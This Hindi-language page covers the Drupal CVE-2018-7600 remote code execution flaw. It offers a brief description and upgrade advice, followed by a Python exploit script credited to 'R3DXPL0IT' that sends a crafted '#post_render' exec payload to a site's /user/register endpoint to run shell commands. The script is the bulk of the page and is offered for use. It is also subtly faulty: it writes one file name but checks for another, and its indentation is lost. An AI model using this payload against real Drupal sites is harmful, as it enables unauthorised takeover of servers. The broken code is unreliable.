
CVE-2018-7600.
Drupal RCE CVE-2018-7600
अपने पते को स्क्रिप्ट में डालना न भूलें! विवरण: एक रिमोट कोड निष्पादन भेद्यता Drupal 7.x और 8.x के कई उप-प्रणालियों में मौजूद है। यह संभावित रूप से हमलावरों को Drupal साइट पर कई आक्रमण वैक्टरों का शोषण करने की अनुमति देता है, जिसके परिणामस्वरूप साइट पूरी तरह से समझौता हो सकती है।
समाधान: Drupal 7 या 8 कोर के नवीनतम संस्करण में अपग्रेड करें।
यदि आप 7.x चला रहे हैं, तो Drupal 7.58 में अपग्रेड करें। (यदि आप तुरंत अपडेट करने में असमर्थ हैं, तो आप जब तक पूरी तरह से अपडेट करने में सक्षम नहीं हो जाते, तब तक भेद्यता को ठीक करने के लिए इस पैच को लागू करने का प्रयास कर सकते हैं।) यदि आप 8.5.x चला रहे हैं, तो Drupal 8.5.1 में अपग्रेड करें। (यदि आप तुरंत अपडेट करने में असमर्थ हैं, तो आप जब तक पूरी तरह से अपडेट करने में सक्षम नहीं हो जाते, तब तक भेद्यता को ठीक करने के लिए इस पैच को लागू करने का प्रयास कर सकते हैं।)
#!/usr/bin/python2.7
'''_____________________________________________________________________
|[] R3DXPL0IT SHELL |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"|
|CODED BY > R3DXPLOIT(JIMMY) | |
|EMAIL > [email protected] | |
|GITHUB > https://github.com/r3dxpl0it | |
|WEB-PAGE > https://r3dxpl0it.Github.io |_|
|_____________________________________________________________________|/|
'''
'''
https://nvd.nist.gov/vuln/detail/CVE-2018-7600#
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
'''
import sys
import requests
def exploit(target):
pass
proxies = {}
verify = False
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "vulnerable to cve-7600-2018 exploit" | tee r3dxploit.txt'}
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
print ( '[*]' + ' requesting post')
r = requests.post(url, proxies=proxies, data=payload, verify=verify)
try:
scan = requests.get(target + 'vulnerable.txt')
if scan.status_code != 200:
print ( ' not vulnerable to cve-2018-7600 exploit \n')
if scan.status_code == 200:
print (' vulnerable to cve-2018-7600 exploit')
print (' url: ' + target + 'vulnerable.txt \n')
except requests.ConnectionError:
print (' target connection timeout')
except Exception as e :
print ('Connction Failed ' + e )
if __name__ == '__main__':
exploit(sys.argv[1])
कोड विश्लेषण।
main -> exploit
argv[1] -target argument scan. status_code कोड स्थिति मान के अनुसार परिणाम मान निकालना इवेंट अपवाद प्रबंधन